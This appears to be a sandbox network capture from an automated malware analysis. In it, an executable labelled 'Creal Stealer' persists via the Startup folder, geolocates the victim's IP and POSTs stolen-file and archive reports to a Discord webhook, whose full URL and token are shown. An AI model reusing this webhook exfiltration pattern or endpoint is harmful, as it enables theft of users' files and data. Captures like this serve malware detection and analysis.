2024-09-27 16:19:05 UTC	332	OUT	POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1 Accept-Encoding: identity Content-Length: 431 Host: discord.com Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Connection: close
2024-09-27 16:19:05 UTC	431	OUT	Data Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 5a 69 70 73 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 5c 6e 5c 6e 22 2c 20 22 63 6f 6c 6f 72 22 3a 20 32 38 39 35 36 36 37 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 43 72 65 61 6c 20 53 74 65 61 6c 65 72 20 7c 20 68 74 74 70 73 3a 2f 2f 74 2e 6d 65 2f 43 72 65 61 6c 53 74 65 61 6c 65 72 22 2c 20 22 69 63 6f 6e 5f 75 72 6c 22 3a 20 22 68 74 74 70 73 3a 2f 2f 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 41 Data Ascii: {"content": ":flag_us: - `user \| 8.46.123.33 (United States)`", "embeds": [{"title": "Creal Zips", "description": "\n\n", "color": 2895667, "footer": {"text": "Creal Stealer \| https://t.me/CrealStealer", "icon_url": "https://raw.githubusercontent.com/A
2024-09-27 16:19:05 UTC	1335	IN	HTTP/1.1 404 Not Found Date: Fri, 27 Sep 2024 16:19:05 GMT Content-Type: application/json Content-Length: 45 Connection: close set-cookie: __dcfduid=3745d8fa7cec11efbb26cece28a49ce1; Expires=Wed, 26-Sep-2029 16:19:05 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 4 x-ratelimit-reset: 1727453946 x-ratelimit-reset-after: 1 via: 1.1 google CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q0GzNcUAQ5QXOYzMaOpozO4%2BjxJxGJGKIdU993iowjdeHkBreq2DYvaZvOwtEOXX%2FvNladSKdp9TQTQNSGxMqQuwKdKEI3nH1ZA6A4dBnu7TKVUcvR4TWgmWjsV%2B"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: __sdcfduid=3745d8fa7cec11efbb26cece28a49ce13daca396a1a4a9e12bcb6eeac38f019c9784077103db5b2217588a1ef5ba7d7d; Expires=Wed, 26-Sep-2029 16:19:05 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax Set-Cookie: __cfruid=7baeebdb1a22e590ef420eaf6d22938737c07a8d-1727453945; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
2024-09-27 16:19:05 UTC	211	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 6b 6e 72 59 7a 38 67 4e 58 49 55 6c 61 43 66 2e 71 5a 79 69 56 36 7a 77 38 41 4d 38 67 50 70 6a 62 32 39 37 30 54 50 73 31 6b 34 2d 31 37 32 37 34 35 33 39 34 35 33 33 37 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 64 30 33 35 62 66 33 34 30 63 38 32 2d 45 57 52 0d 0a 0d 0a Data Ascii: Set-Cookie: _cfuvid=knrYz8gNXIUlaCf.qZyiV6zw8AM8gPpjb2970TPs1k4-1727453945337-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9cd035bf340c82-EWR
2024-09-27 16:19:05 UTC	45	IN	Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d Data Ascii: {"message": "Unknown Webhook", "code": 10015}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.8	49751	162.159.136.232	443	4040	C:\Users\user\Desktop\HyZh4pn0RF.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 16:19:05 UTC	332	OUT	POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1 Accept-Encoding: identity Content-Length: 506 Host: discord.com Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Connection: close
2024-09-27 16:19:05 UTC	506	OUT	Data Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 63 6f 6c 6f 72 22 3a 20 32 38 39 35 36 36 37 2c 20 22 66 69 65 6c 64 73 22 3a 20 5b 7b 22 6e 61 6d 65 22 3a 20 22 49 6e 74 65 72 65 73 74 69 6e 67 20 66 69 6c 65 73 20 66 6f 75 6e 64 20 6f 6e 20 75 73 65 72 20 50 43 3a 22 2c 20 22 76 61 6c 75 65 22 3a 20 22 5c 6e 22 7d 5d 2c 20 22 61 75 74 68 6f 72 22 3a 20 7b 22 6e 61 6d 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 46 69 6c 65 20 53 74 65 61 6c 65 72 22 7d 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 43 72 65 61 6c 20 53 74 65 61 6c 65 72 20 7c 20 68 74 Data Ascii: {"content": ":flag_us: - `user \| 8.46.123.33 (United States)`", "embeds": [{"color": 2895667, "fields": [{"name": "Interesting files found on user PC:", "value": "\n"}], "author": {"name": "Creal \| File Stealer"}, "footer": {"text": "Creal Stealer \| ht
2024-09-27 16:19:05 UTC	1335	IN	HTTP/1.1 404 Not Found Date: Fri, 27 Sep 2024 16:19:05 GMT Content-Type: application/json Content-Length: 45 Connection: close set-cookie: __dcfduid=374743ac7cec11efad60cece28a49ce1; Expires=Wed, 26-Sep-2029 16:19:05 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 3 x-ratelimit-reset: 1727453947 x-ratelimit-reset-after: 1 via: 1.1 google CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FAPX00iiQL2rdPnCQWLuW6iaItu3J7BL86ppxuslPnr%2B4oFrLgyLmEUsd6U97Dt7l1l4eDhFjjBxSy5Wf96AqxS1hGIjlQFmnMBumy%2BI43B2QF%2BS7g2YCxCsJjvz"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: __sdcfduid=374743ac7cec11efad60cece28a49ce116494306dec66456f12201b532cb9c28525ab117b160869c96c8222438cb39be; Expires=Wed, 26-Sep-2029 16:19:05 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax Set-Cookie: __cfruid=7baeebdb1a22e590ef420eaf6d22938737c07a8d-1727453945; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
2024-09-27 16:19:05 UTC	211	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 51 6b 7a 35 4c 5a 70 76 37 4c 79 4c 55 64 36 44 55 63 66 70 47 6d 4f 6e 4c 4f 54 30 67 31 72 30 45 39 4e 74 4b 64 6e 71 55 64 45 2d 31 37 32 37 34 35 33 39 34 35 33 34 35 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 64 30 33 35 65 39 63 31 34 33 30 39 2d 45 57 52 0d 0a 0d 0a Data Ascii: Set-Cookie: _cfuvid=Qkz5LZpv7LyLUd6DUcfpGmOnLOT0g1r0E9NtKdnqUdE-1727453945345-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9cd035e9c14309-EWR
2024-09-27 16:19:05 UTC	45	IN	Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d Data Ascii: {"message": "Unknown Webhook", "code": 10015}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.8	49753	162.159.136.232	443	5340	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 16:19:05 UTC	332	OUT	POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1 Accept-Encoding: identity Content-Length: 431 Host: discord.com Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Connection: close
2024-09-27 16:19:05 UTC	431	OUT	Data Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 5a 69 70 73 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 5c 6e 5c 6e 22 2c 20 22 63 6f 6c 6f 72 22 3a 20 32 38 39 35 36 36 37 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 43 72 65 61 6c 20 53 74 65 61 6c 65 72 20 7c 20 68 74 74 70 73 3a 2f 2f 74 2e 6d 65 2f 43 72 65 61 6c 53 74 65 61 6c 65 72 22 2c 20 22 69 63 6f 6e 5f 75 72 6c 22 3a 20 22 68 74 74 70 73 3a 2f 2f 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 41 Data Ascii: {"content": ":flag_us: - `user \| 8.46.123.33 (United States)`", "embeds": [{"title": "Creal Zips", "description": "\n\n", "color": 2895667, "footer": {"text": "Creal Stealer \| https://t.me/CrealStealer", "icon_url": "https://raw.githubusercontent.com/A
2024-09-27 16:19:06 UTC	1339	IN	HTTP/1.1 404 Not Found Date: Fri, 27 Sep 2024 16:19:06 GMT Content-Type: application/json Content-Length: 45 Connection: close set-cookie: __dcfduid=37aeaeb67cec11ef85eda6d8f199100f; Expires=Wed, 26-Sep-2029 16:19:06 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 3 x-ratelimit-reset: 1727453947 x-ratelimit-reset-after: 1 via: 1.1 google CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KM4BQVU0LGejaUHXf1y3BqoHku%2BjDuqeQVXkWTBIfnTsUWC5NH2ZIf354Pdni3mz7bfks51DO%2F%2BoY5Hl348PyPRudfcQ%2Be58hKtyTFrk80aXU2QuvQMhgKwcJm%2B7"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: __sdcfduid=37aeaeb67cec11ef85eda6d8f199100f6db23391f423498162d6ca09eef0d3fa3b8684ee6f6c835feaaad9d48724a5b9; Expires=Wed, 26-Sep-2029 16:19:06 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax Set-Cookie: __cfruid=775dfac769927facd0539e6a10014028daddaa4a-1727453946; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
2024-09-27 16:19:06 UTC	211	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 45 39 78 4f 75 5f 33 52 73 62 75 53 70 58 43 78 49 32 44 71 72 58 78 68 75 36 58 2e 55 42 58 63 33 6e 34 59 54 74 63 53 53 69 41 2d 31 37 32 37 34 35 33 39 34 36 30 32 31 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 64 30 33 61 32 39 62 65 34 33 32 31 2d 45 57 52 0d 0a 0d 0a Data Ascii: Set-Cookie: _cfuvid=E9xOu_3RsbuSpXCxI2DqrXxhu6X.UBXc3n4YTtcSSiA-1727453946021-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9cd03a29be4321-EWR
2024-09-27 16:19:06 UTC	45	IN	Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d Data Ascii: {"message": "Unknown Webhook", "code": 10015}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.8	49754	162.159.136.232	443	4040	C:\Users\user\Desktop\HyZh4pn0RF.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 16:19:05 UTC	332	OUT	POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1 Accept-Encoding: identity Content-Length: 506 Host: discord.com Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Connection: close
2024-09-27 16:19:05 UTC	506	OUT	Data Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 63 6f 6c 6f 72 22 3a 20 32 38 39 35 36 36 37 2c 20 22 66 69 65 6c 64 73 22 3a 20 5b 7b 22 6e 61 6d 65 22 3a 20 22 49 6e 74 65 72 65 73 74 69 6e 67 20 66 69 6c 65 73 20 66 6f 75 6e 64 20 6f 6e 20 75 73 65 72 20 50 43 3a 22 2c 20 22 76 61 6c 75 65 22 3a 20 22 5c 6e 22 7d 5d 2c 20 22 61 75 74 68 6f 72 22 3a 20 7b 22 6e 61 6d 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 46 69 6c 65 20 53 74 65 61 6c 65 72 22 7d 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 43 72 65 61 6c 20 53 74 65 61 6c 65 72 20 7c 20 68 74 Data Ascii: {"content": ":flag_us: - `user \| 8.46.123.33 (United States)`", "embeds": [{"color": 2895667, "fields": [{"name": "Interesting files found on user PC:", "value": "\n"}], "author": {"name": "Creal \| File Stealer"}, "footer": {"text": "Creal Stealer \| ht
2024-09-27 16:19:06 UTC	1333	IN	HTTP/1.1 404 Not Found Date: Fri, 27 Sep 2024 16:19:06 GMT Content-Type: application/json Content-Length: 45 Connection: close set-cookie: __dcfduid=37aff3e87cec11efbb52ae4c9400efeb; Expires=Wed, 26-Sep-2029 16:19:06 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 2 x-ratelimit-reset: 1727453947 x-ratelimit-reset-after: 1 via: 1.1 google CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9qMQEAOm6NrlxMh8s5UO%2F%2BHEiFd9jjLNvRT7o6EEr7zlXwjBoVwfX1RzuhBGYqASBddXH8Ev2mezdRqvfmO2DsKUNUlSPrAv99SbtoHzfbc9J96PEV14RAe1z3zC"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: __sdcfduid=37aff3e87cec11efbb52ae4c9400efebca9b0b1ab47e7d0f658e805fca08bf61eebe35b75bba37ff949679cb1f0dcdba; Expires=Wed, 26-Sep-2029 16:19:06 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax Set-Cookie: __cfruid=775dfac769927facd0539e6a10014028daddaa4a-1727453946; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
2024-09-27 16:19:06 UTC	211	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 41 6d 70 39 77 34 66 30 57 76 69 41 52 55 56 7a 38 4e 46 58 72 61 6c 77 55 59 37 77 37 31 6f 76 77 49 51 2e 75 77 34 57 54 59 49 2d 31 37 32 37 34 35 33 39 34 36 30 33 30 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 64 30 33 61 35 66 31 39 38 63 63 35 2d 45 57 52 0d 0a 0d 0a Data Ascii: Set-Cookie: _cfuvid=Amp9w4f0WviARUVz8NFXralwUY7w71ovwIQ.uw4WTYI-1727453946030-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9cd03a5f198cc5-EWR
2024-09-27 16:19:06 UTC	45	IN	Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d Data Ascii: {"message": "Unknown Webhook", "code": 10015}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.8	49752	159.89.102.253	443	5340	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 16:19:06 UTC	139	OUT	GET /jsonp/8.46.123.33 HTTP/1.1 Accept-Encoding: identity Host: geolocation-db.com User-Agent: Python-urllib/3.12 Connection: close
2024-09-27 16:19:06 UTC	206	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Fri, 27 Sep 2024 16:19:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Access-Control-Allow-Origin: *
2024-09-27 16:19:06 UTC	171	IN	Data Raw: 61 30 0d 0a 63 61 6c 6c 62 61 63 6b 28 7b 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 5f 6e 61 6d 65 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 69 74 79 22 3a 6e 75 6c 6c 2c 22 70 6f 73 74 61 6c 22 3a 6e 75 6c 6c 2c 22 6c 61 74 69 74 75 64 65 22 3a 33 37 2e 37 35 31 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 2d 39 37 2e 38 32 32 2c 22 49 50 76 34 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 22 73 74 61 74 65 22 3a 6e 75 6c 6c 7d 29 0d 0a 30 0d 0a 0d 0a Data Ascii: a0callback({"country_code":"US","country_name":"United States","city":null,"postal":null,"latitude":37.751,"longitude":-97.822,"IPv4":"8.46.123.33","state":null})0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.8	49756	162.159.136.232	443	4040	C:\Users\user\Desktop\HyZh4pn0RF.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 16:19:06 UTC	332	OUT	POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1 Accept-Encoding: identity Content-Length: 506 Host: discord.com Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Connection: close
2024-09-27 16:19:06 UTC	506	OUT	Data Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 63 6f 6c 6f 72 22 3a 20 32 38 39 35 36 36 37 2c 20 22 66 69 65 6c 64 73 22 3a 20 5b 7b 22 6e 61 6d 65 22 3a 20 22 49 6e 74 65 72 65 73 74 69 6e 67 20 66 69 6c 65 73 20 66 6f 75 6e 64 20 6f 6e 20 75 73 65 72 20 50 43 3a 22 2c 20 22 76 61 6c 75 65 22 3a 20 22 5c 6e 22 7d 5d 2c 20 22 61 75 74 68 6f 72 22 3a 20 7b 22 6e 61 6d 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 46 69 6c 65 20 53 74 65 61 6c 65 72 22 7d 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 43 72 65 61 6c 20 53 74 65 61 6c 65 72 20 7c 20 68 74 Data Ascii: {"content": ":flag_us: - `user \| 8.46.123.33 (United States)`", "embeds": [{"color": 2895667, "fields": [{"name": "Interesting files found on user PC:", "value": "\n"}], "author": {"name": "Creal \| File Stealer"}, "footer": {"text": "Creal Stealer \| ht
2024-09-27 16:19:06 UTC	1337	IN	HTTP/1.1 404 Not Found Date: Fri, 27 Sep 2024 16:19:06 GMT Content-Type: application/json Content-Length: 45 Connection: close set-cookie: __dcfduid=381339c67cec11efbb26cece28a49ce1; Expires=Wed, 26-Sep-2029 16:19:06 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 3 x-ratelimit-reset: 1727453948 x-ratelimit-reset-after: 1 via: 1.1 google CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bil0c3CqXVvvD3zwBq227AuCXJ3tJeoBU0%2BHWNRRSZLHasVn8Ad5p5m3AkkUnFib2hv%2BhS2wH80N8jALQm4SdDrYhkbc0umG8QJ1PufWFMqy0zybpgcuTfF%2F%2BUl4"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: __sdcfduid=381339c67cec11efbb26cece28a49ce1f7bd41e7dceb3c44c257ff999305afb072279e843d1fc80df6472b02d4fd096e; Expires=Wed, 26-Sep-2029 16:19:06 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax Set-Cookie: __cfruid=775dfac769927facd0539e6a10014028daddaa4a-1727453946; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
2024-09-27 16:19:06 UTC	211	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 5f 5a 69 51 6b 76 33 31 2e 5a 75 72 64 36 39 35 76 64 57 57 74 44 45 4b 31 5a 64 38 55 6b 6c 64 64 6d 76 5a 48 58 4c 62 6b 67 45 2d 31 37 32 37 34 35 33 39 34 36 36 38 36 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 64 30 33 65 35 38 66 33 38 63 62 61 2d 45 57 52 0d 0a 0d 0a Data Ascii: Set-Cookie: _cfuvid=_ZiQkv31.Zurd695vdWWtDEK1Zd8UklddmvZHXLbkgE-1727453946686-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9cd03e58f38cba-EWR
2024-09-27 16:19:06 UTC	45	IN	Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d Data Ascii: {"message": "Unknown Webhook", "code": 10015}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.8	49755	162.159.136.232	443	5340	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 16:19:06 UTC	332	OUT	POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1 Accept-Encoding: identity Content-Length: 431 Host: discord.com Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Connection: close
